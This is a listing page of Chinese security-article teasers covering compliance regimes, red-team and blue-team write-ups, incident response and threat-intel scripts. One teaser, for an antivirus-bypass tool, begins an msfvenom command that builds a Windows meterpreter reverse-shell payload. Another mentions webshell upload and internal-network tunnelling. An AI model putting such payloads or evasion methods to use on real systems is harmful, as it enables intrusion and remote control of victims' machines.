来源于网络,如侵权请联系删除。原文始发于微信公众号(HACK之道):干货|分保、等保、关保、密评——3保1评之间的联系与区别
12月01日30 views评论干货
等保
安全攻与防 | 攻防演练
前言 看到一处登录后台,各种操作都尝试过无果,翻了一下js,看到一处文件上传接口泄露(没图了,已经整改了) 构造上传数据包,很nice,上传成功 直接连接webll,搭建隧道进行内网穿透 翻看配置文件...
03月04日28 views评论nacos
攻防演练
学习干货|详解一次简单的综合应急响应学习思路
0x01 前言 本次把前面练习的应急响应作为基础,相当于期末复习,做一个简单的模拟,主要是学习思路,靶机原型为vulnhub-evil,其中做了部分改动,以蓝方视角呈现,只作为总结、较为简单、缕清思路...
12月23日77 views评论应急响应
靶机
干货 | 蓝队溯源自动化脚本
功能将文本中含有的IP进行标记、添加IP物理位置标记,并进行输出。提取存在的外网IP,依赖奇安信威胁分析武器库进行批量自动化情报查询,展示IP信誉详情、实现检测详情、恶意详情以及数据统计,并输出xls...
09月04日139 views评论ip
情报
HW安全圈热点-段子+晚报(HVV)
SQL注入,简单几步
Bypass360 | 工具(近期更新)
0x01 工具介绍 绕过360工具。 0x02 安装与使用 1、生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1...
06月07日175 views评论bypass
shellcode
【干货】渗透X国外空投的狗血经历
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!首先我们找到空投网站 听说可以领取空投但是邀请好友 需要注册那么我们先分析第一个 任意用户注册 ,找到我们的注册界面分析注册界面 是用邮箱注册...
06月05日19 views评论干货
校验
实战某985院x校支付漏洞
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!0x01 前言web应用程序中的逻辑漏洞各不相同,有的很明显,有的很微妙。与SQL注入和跨站不同,逻辑漏洞没有共有的“签名”,定义特...
05月28日42 views评论开发者
逻辑漏洞
干货|Java内存马查杀GUI工具
作者:4ra1n,转载于乌雲安全。如侵权请联系删除。项目地址:https://github.com/4ra1n/shell-analyzer 注意:请勿在生产环境使用,存在打崩业务的风险,目前适用于自...
04月10日77 views评论中间件
干货
Android Framework学习路线
推荐阅读Android adb常用命令Android adb命令总结Android系统开机过程解析Android中奇淫run-as命令玩转Android adb命令(adb降级)如何深入学习Andro...
02月25日288 views评论android
java
干货|蓝队溯源自动化脚本
功能 将文本中含有的IP进行标记、添加IP物理位置标记,并进行输出。提取存在的外网IP,依赖奇安信威胁分析武器库进行批量自动化情报查询,展示IP信誉详情、实现检测详情、恶意详情以及数据统计,并输出xl...
02月24日57 views评论ip
情报